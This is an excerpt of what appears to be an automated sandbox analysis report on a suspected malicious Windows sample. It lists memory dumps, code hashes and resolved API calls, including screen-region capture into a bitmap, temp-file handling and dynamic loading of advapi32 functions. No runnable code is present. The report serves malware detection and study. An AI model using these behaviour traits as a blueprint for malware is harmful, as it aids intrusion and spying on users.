                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                        • Instruction ID: 17d51d5b300be6fda15d6e9c51080074a5fe89cb95b8a1fe99688159c0e7d008
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 099174722490A30AEB2D463D857413EFFE19B421A531A07AEE4FACF1C1EF24D656D620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                        • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                        • Instruction ID: fc32b042fd186def8b2cba39c5a16b1649e3a497277ad81bfbc99154b392c6fd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A36187717C070A6ADE386E6CB894BBE6395AF41B0CF04047AE98EDF2C0DF159942C756
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                        • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                        • Instruction ID: c4c54d945bfdd87da21493bcb559a30089809b9406bf86a921bfb93a5efde413
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 498160722490E74AEB6D467E847403EFFE19B421A531E079ED4FACB1C1EF249366D620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                        • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction ID: eab27791ce22bb8c9b75661be7e3ded75c96187e7993526e5c1fc4454fc67fc3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE1127B72C004347D6188B3EDCB46BBE385EBC6228B2F967AD14D4B758DF22E145D600
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                        • Instruction ID: e34f56f3bfe50da565a1e1af7ef5e3310d146e548d978d23d973017875ff0dc5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 951170723401009FD754DE59DCC1FE773EAEB89321B29806AED08CB316E67AE842C764
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                        • Instruction ID: 6a7ae1ff5e9c438eb39d1739dd139b69842fd91671cf499703bb93b43dee2957
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C012B766516148FDF21CF20C804BAA33F5FB99205F1541B4E506D7341E370A845CB80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                        • String ID: Tahoma
                                                                                                                                                                                                                                        • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                        • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                        • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                        • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                        • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                        • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                        • String ID: gya
                                                                                                                                                                                                                                        • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                        • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                        • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                        • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                        • Instruction ID: 13acc8b90ade95fe423401a4d0c6b285cc40fb5bd95dfec3f1d9eaaeec69fb9a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66B19E719803099FDB21DF68C880BEEBBF5BF09304F1445AEE9A9A7241DB759941CF60
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                        • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                        • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0215A8A3
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C0F
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C21
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C33
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C45
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C57
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C69
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C7B
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C8D
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C9F
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CB1
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CC3
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CD5
                                                                                                                                                                                                                                          • Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CE7
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A898
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A8BA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A8CF
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A8DA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A8FC
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A90F
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A91D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A928
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A960
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A967
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A984
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A99C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                        • Instruction ID: b69cd81466f2304e1f0b836994753dc1f5ffcf5f5b34d73cb6444a232e376082
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7317F31680221DFDB206F38D844B56B3E5AF00391F114AEEEC79D7650DB75A990CB94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                          • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                        • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                        • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0213F228,00000004,02137D87,00000004,02138069), ref: 0213EEF9
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000,?), ref: 0213EF05
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000), ref: 0213EF15
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF2B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF41
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF58
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF6F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF86
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF9D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
